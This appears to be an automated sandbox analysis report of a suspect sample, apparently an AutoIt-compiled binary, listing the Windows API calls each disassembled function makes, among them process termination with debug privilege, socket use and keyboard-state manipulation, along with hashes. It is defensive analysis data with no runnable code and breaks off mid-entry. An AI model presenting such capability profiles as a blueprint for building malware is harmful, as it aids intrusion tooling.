                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                • String ID:
                • API String ID: 1957940570-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0017D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0017D501
                  • Part of subcall function 0017D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0017D50F
                  • Part of subcall function 0017D4DC: CloseHandle.KERNEL32(00000000), ref: 0017D5DC
                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019A16D
                • GetLastError.KERNEL32 ref: 0019A180
                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019A1B3
                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0019A268
                • GetLastError.KERNEL32(00000000), ref: 0019A273
                • CloseHandle.KERNEL32(00000000), ref: 0019A2C4
                Strings
                Similarity
                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                • String ID: SeDebugPrivilege
                • API String ID: 2533919879-2896544425
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001A3925
                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001A393A
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001A3954
                • _wcslen.LIBCMT ref: 001A3999
                • SendMessageW.USER32(?,00001057,00000000,?), ref: 001A39C6
                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001A39F4
                Strings
                Similarity
                • API ID: MessageSend$Window_wcslen
                • String ID: SysListView32
                • API String ID: 2147712094-78025650
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0017BCFD
                • IsMenu.USER32(00000000), ref: 0017BD1D
                • CreatePopupMenu.USER32 ref: 0017BD53
                • GetMenuItemCount.USER32(00DE58C8), ref: 0017BDA4
                • InsertMenuItemW.USER32(00DE58C8,?,00000001,00000030), ref: 0017BDCC
                Strings
                Similarity
                • API ID: Menu$Item$CountCreateInfoInsertPopup
                • String ID: 0$2
                • API String ID: 93392585-3793063076
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadIconW.USER32(00000000,00007F03), ref: 0017C913
                Strings
                Similarity
                • API ID: IconLoad
                • String ID: blank$info$question$stop$warning
                • API String ID: 2457776203-404129466
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Similarity
                • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                • String ID: 0.0.0.0
                • API String ID: 642191829-3771769585
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: _wcslen$LocalTime
                • String ID:
                • API String ID: 952045576-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0016682C,00000004,00000000,00000000), ref: 0012F953
                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0016682C,00000004,00000000,00000000), ref: 0016F3D1
                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0016682C,00000004,00000000,00000000), ref: 0016F454
                Similarity
                • API ID: ShowWindow
                • String ID:
                • API String ID: 1268545403-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DeleteObject.GDI32(00000000), ref: 001A2D1B
                • GetDC.USER32(00000000), ref: 001A2D23
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001A2D2E
                • ReleaseDC.USER32(00000000,00000000), ref: 001A2D3A
                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001A2D76
                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001A2D87
                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001A5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 001A2DC2
                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001A2DE1
                Similarity
                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                • String ID:
                • API String ID: 3864802216-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: _memcmp
                • String ID:
                • API String ID: 2931989736-0
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Similarity
                • API ID:
                • String ID: NULL Pointer assignment$Not an Object type
                • API String ID: 0-572801152
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001515CE
                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00151651
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001517FB,?,001517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001516E4
                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001516FB
                  • Part of subcall function 00143820: RtlAllocateHeap.NTDLL(00000000,?,001E1444,?,0012FDF5,?,?,0011A976,00000010,001E1440,001113FC,?,001113C6,?,00111129), ref: 00143852
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00151777
                • __freea.LIBCMT ref: 001517A2
                • __freea.LIBCMT ref: 001517AE
                Similarity
                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                • String ID:
                • API String ID: 2829977744-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Similarity
                • API ID: Variant$ClearInit
                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                • API String ID: 2610073882-625585964
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0018125C
                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00181284
                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001812A8
                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001812D8
                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0018135F
                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001813C4
                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00181430
                Similarity
                • API ID: ArraySafe$Data$Access$UnaccessVartype
                • String ID:
                • API String ID: 2550207440-0
                • Opcode ID: 107d884de9b05c43d7d0ec11dbe01df746f7198b1769b610a2d0999871bd4fc4
                • Instruction ID: 7628da22096d1bbac4c9225b2ba6a698371c927cff165ab5d5ecf7fd6f492c20
                • Opcode Fuzzy Hash: 107d884de9b05c43d7d0ec11dbe01df746f7198b1769b610a2d0999871bd4fc4
                • Instruction Fuzzy Hash: 8D91D372A00219AFDB05EFA4C884BFE77B9FF55315F214029E901E7291D774AA46CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ObjectSelect$BeginCreatePath
                • String ID:
                • API String ID: 3225163088-0
                • Opcode ID: 96f2464e5823ab761105064e981bc7ae9ed60200e51d9781a8a7bbffadb8c0a0
                • Instruction ID: c89ea9926062d4204c2f99d30c0048d8dab7f3266a353df8da86f04faff75dce
                • Opcode Fuzzy Hash: 96f2464e5823ab761105064e981bc7ae9ed60200e51d9781a8a7bbffadb8c0a0
                • Instruction Fuzzy Hash: F7913971E00219EFCB14CFA9DC84AEEBBB8FF49320F14415AE515B7291D778A951CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VariantInit.OLEAUT32(?), ref: 0019396B
                • CharUpperBuffW.USER32(?,?), ref: 00193A7A
                • _wcslen.LIBCMT ref: 00193A8A
                • VariantClear.OLEAUT32(?), ref: 00193C1F
                  • Part of subcall function 00180CDF: VariantInit.OLEAUT32(00000000), ref: 00180D1F
                  • Part of subcall function 00180CDF: VariantCopy.OLEAUT32(?,?), ref: 00180D28
                  • Part of subcall function 00180CDF: VariantClear.OLEAUT32(?), ref: 00180D34
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                • API String ID: 4137639002-1221869570
                • Opcode ID: 2382d5be97625567be044b7c58c0fcc13eb5fea9b3ea301c0d48b24b4c94640f
                • Instruction ID: 4440a3644cf67b5243ed2c8c6b78da721dc8dab3fdac12a353e5e70243314d7c
                • Opcode Fuzzy Hash: 2382d5be97625567be044b7c58c0fcc13eb5fea9b3ea301c0d48b24b4c94640f
                • Instruction Fuzzy Hash: 1B9169756083059FCB14EF64C48096AB7E5FF99314F14882EF89A9B351DB30EE45CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0017000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?,?,0017035E), ref: 0017002B
                  • Part of subcall function 0017000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?), ref: 00170046
                  • Part of subcall function 0017000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?), ref: 00170054
                  • Part of subcall function 0017000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?), ref: 00170064
                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00194C51
                • _wcslen.LIBCMT ref: 00194D59
                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00194DCF
                • CoTaskMemFree.OLE32(?), ref: 00194DDA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                • String ID: NULL Pointer assignment
                • API String ID: 614568839-2785691316
                • Opcode ID: d1df4590cc183bb14a7e646bf929173cb7b21b1cee670347ac79ef7cad8f90c4
                • Instruction ID: 0a84c2818bdc2d77a7ee780437cfb0b4b93be98040c9a3d3e2a2685e92d0b507
                • Opcode Fuzzy Hash: d1df4590cc183bb14a7e646bf929173cb7b21b1cee670347ac79ef7cad8f90c4
                • Instruction Fuzzy Hash: 75912771D0021DAFDF15DFA4D890EEEBBB8BF18314F108169E919A7251EB349A45CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetMenu.USER32(?), ref: 001A2183
                • GetMenuItemCount.USER32(00000000), ref: 001A21B5
                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001A21DD
                • _wcslen.LIBCMT ref: 001A2213
                • GetMenuItemID.USER32(?,?), ref: 001A224D
                • GetSubMenu.USER32(?,?), ref: 001A225B
                  • Part of subcall function 00173A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00173A57
                  • Part of subcall function 00173A3D: GetCurrentThreadId.KERNEL32 ref: 00173A5E
                  • Part of subcall function 00173A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001725B3), ref: 00173A65
                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001A22E3
                  • Part of subcall function 0017E97B: Sleep.KERNEL32 ref: 0017E9F3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                • String ID:
                • API String ID: 4196846111-0
                • Opcode ID: 20f9a5714ac854764e1058f48dc130ec1c4b2f749d6b4b3b2538ccc7dfa343d7
                • Instruction ID: bbf40f86b87154caf0e7609578223e3ee10354675f78ef89230d84efb57bfb5c
                • Opcode Fuzzy Hash: 20f9a5714ac854764e1058f48dc130ec1c4b2f749d6b4b3b2538ccc7dfa343d7
                • Instruction Fuzzy Hash: 98717F79E00205AFCB14DFA8C845AAEB7F5EF5A310F158469E816EB351DB34ED428B90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsWindow.USER32(00DE5878), ref: 001A7F37
                • IsWindowEnabled.USER32(00DE5878), ref: 001A7F43
                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 001A801E
                • SendMessageW.USER32(00DE5878,000000B0,?,?), ref: 001A8051
                • IsDlgButtonChecked.USER32(?,?), ref: 001A8089
                • GetWindowLongW.USER32(00DE5878,000000EC), ref: 001A80AB
                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001A80C3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                • String ID:
                • API String ID: 4072528602-0
                • Opcode ID: 9854412265a61c45d6402e39ad8320938bba475a72d6c87ae112db969fe6a750
                • Instruction ID: de887af503c5b475d7b69dbacb701dbed2408261081830ab6d884b6f59d23a96
                • Opcode Fuzzy Hash: 9854412265a61c45d6402e39ad8320938bba475a72d6c87ae112db969fe6a750
                • Instruction Fuzzy Hash: B471AE78608204AFEB25DF64CC94FEA7BB5EF1B300F144459F955972A1CB31AE44CB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetParent.USER32(?), ref: 0017AEF9
                • GetKeyboardState.USER32(?), ref: 0017AF0E
                • SetKeyboardState.USER32(?), ref: 0017AF6F
                • PostMessageW.USER32(?,00000101,00000010,?), ref: 0017AF9D
                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0017AFBC
                • PostMessageW.USER32(?,00000101,00000012,?), ref: 0017AFFD
                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0017B020
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: 69a69dc347c41b3cc461eecd247466947751f70bad18a3890e1052a56b4a1e31
                • Instruction ID: 86794bfa7b42ea9558345bae8f93bd1b3a66f6035e6a7cd8b35f5a6d47ce6c41
                • Opcode Fuzzy Hash: 69a69dc347c41b3cc461eecd247466947751f70bad18a3890e1052a56b4a1e31
                • Instruction Fuzzy Hash: AB51CFA06086D53DFB3682348885BBEBEB95F46304F08C589F1DD958C2C798A8C8D752
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetParent.USER32(00000000), ref: 0017AD19
                • GetKeyboardState.USER32(?), ref: 0017AD2E
                • SetKeyboardState.USER32(?), ref: 0017AD8F
                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0017ADBB
                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0017ADD8
                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0017AE17
                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0017AE38
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: 1e7dcd94add94fcd5470f3d8bd8d39ef816b6fd1b0964f54fd612431bf548864
                • Instruction ID: 6dde2b113b045f9949e1f30f8fce2b3b5c2cd6f06619c66a761764ae4dbe034d
                • Opcode Fuzzy Hash: 1e7dcd94add94fcd5470f3d8bd8d39ef816b6fd1b0964f54fd612431bf548864
                • Instruction Fuzzy Hash: 9B51C1A15487D53DFB368364CC95BBEBEB95F86300F48C488E1DD86882D794AC88D762
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetConsoleCP.KERNEL32(00153CD6,?,?,?,?,?,?,?,?,00145BA3,?,?,00153CD6,?,?), ref: 00145470
                • __fassign.LIBCMT ref: 001454EB
                • __fassign.LIBCMT ref: 00145506
                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00153CD6,00000005,00000000,00000000), ref: 0014552C
                • WriteFile.KERNEL32(?,00153CD6,00000000,00145BA3,00000000,?,?,?,?,?,?,?,?,?,00145BA3,?), ref: 0014554B
                • WriteFile.KERNEL32(?,?,00000001,00145BA3,00000000,?,?,?,?,?,?,?,?,?,00145BA3,?), ref: 00145584
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: 0f222c7878c2fc178d2bf765cba013191fc27fa64e7b27dd19406037670925ab
                • Instruction ID: 4d2ab04e879ffd856f010a7188ee69e4c8e326d40ee8e180c5c8da0ed4c5b5ca
                • Opcode Fuzzy Hash: 0f222c7878c2fc178d2bf765cba013191fc27fa64e7b27dd19406037670925ab
                • Instruction Fuzzy Hash: 2A51D871A00649AFDB11CFA8D885AFEBBF6EF09310F14411AF555EB2A2D730DA41CB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _ValidateLocalCookies.LIBCMT ref: 00132D4B
                • ___except_validate_context_record.LIBVCRUNTIME ref: 00132D53
                • _ValidateLocalCookies.LIBCMT ref: 00132DE1
                • __IsNonwritableInCurrentImage.LIBCMT ref: 00132E0C
                • _ValidateLocalCookies.LIBCMT ref: 00132E61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: d1fe31267ffbc5ea1a52c1c645ffc245e2794d0243f543875e1898aa5b8644eb
                • Instruction ID: ca6f64e2b738f807c2a6db0e3cfc30feea763e57ecbb0d358bb770a79d1f4ebd
                • Opcode Fuzzy Hash: d1fe31267ffbc5ea1a52c1c645ffc245e2794d0243f543875e1898aa5b8644eb
                • Instruction Fuzzy Hash: DD41A734E00209EBCF14EFA8C845A9EBBB5BF45324F148155F919AB352D735DA45CBD0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0019304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0019307A
                  • Part of subcall function 0019304E: _wcslen.LIBCMT ref: 0019309B
                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00191112
                • WSAGetLastError.WSOCK32 ref: 00191121
                • WSAGetLastError.WSOCK32 ref: 001911C9
                • closesocket.WSOCK32(00000000), ref: 001911F9
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                • String ID:
                • API String ID: 2675159561-0
                • Opcode ID: fac2b656ca98dd6fc8c6e22d3575d2c18ac236a6ac66b56198151443f522bd48
                • Instruction ID: 9110dda6e008526fe78ae0d211e58220c5a6903cfed6912beb5fcd380d6d2e68
                • Opcode Fuzzy Hash: fac2b656ca98dd6fc8c6e22d3575d2c18ac236a6ac66b56198151443f522bd48
                • Instruction Fuzzy Hash: 9241CF31600205BFDB149F64C884BAABBEAFF45364F148069F9169B291C774EDC1CBE1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0017DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0017CF22,?), ref: 0017DDFD
                  • Part of subcall function 0017DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0017CF22,?), ref: 0017DE16
                • lstrcmpiW.KERNEL32(?,?), ref: 0017CF45
                • MoveFileW.KERNEL32(?,?), ref: 0017CF7F
                • _wcslen.LIBCMT ref: 0017D005
                • _wcslen.LIBCMT ref: 0017D01B
                • SHFileOperationW.SHELL32(?), ref: 0017D061
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                • String ID: \*.*
                • API String ID: 3164238972-1173974218
                • Opcode ID: 1c049c5e408eba1b76780d485f53f279abee5f3eb318e7d453406079108ac77b
                • Instruction ID: 205c37d5ba797f7de024d68b442363ab3bbb045c6ed7bc74f2b2e694d6250326
                • Opcode Fuzzy Hash: 1c049c5e408eba1b76780d485f53f279abee5f3eb318e7d453406079108ac77b
                • Instruction Fuzzy Hash: 294114719452189FDF16EBA4D981BDEB7F9AF19380F1040EAE509EB141EB34A788CB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001A2E1C
                • GetWindowLongW.USER32(00000000,000000F0), ref: 001A2E4F
                • GetWindowLongW.USER32(00000000,000000F0), ref: 001A2E84
                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001A2EB6
                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001A2EE0
                • GetWindowLongW.USER32(00000000,000000F0), ref: 001A2EF1
                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001A2F0B
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LongWindow$MessageSend
                • String ID:
                • API String ID: 2178440468-0
                • Opcode ID: f9093a39de399376b47f4b7302d5735c77ae76f396be978cba532c0bcd3a9598
                • Instruction ID: d032bc4bb0a4de08083ce842f904e65e413916ef3a9ccfc2f9600d526306efe3
                • Opcode Fuzzy Hash: f9093a39de399376b47f4b7302d5735c77ae76f396be978cba532c0bcd3a9598
                • Instruction Fuzzy Hash: 8331D239645290AFDB21CF5CDC84FA937E5EB9AB14F150164F905CF6B2CB71A880DB81
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00177769
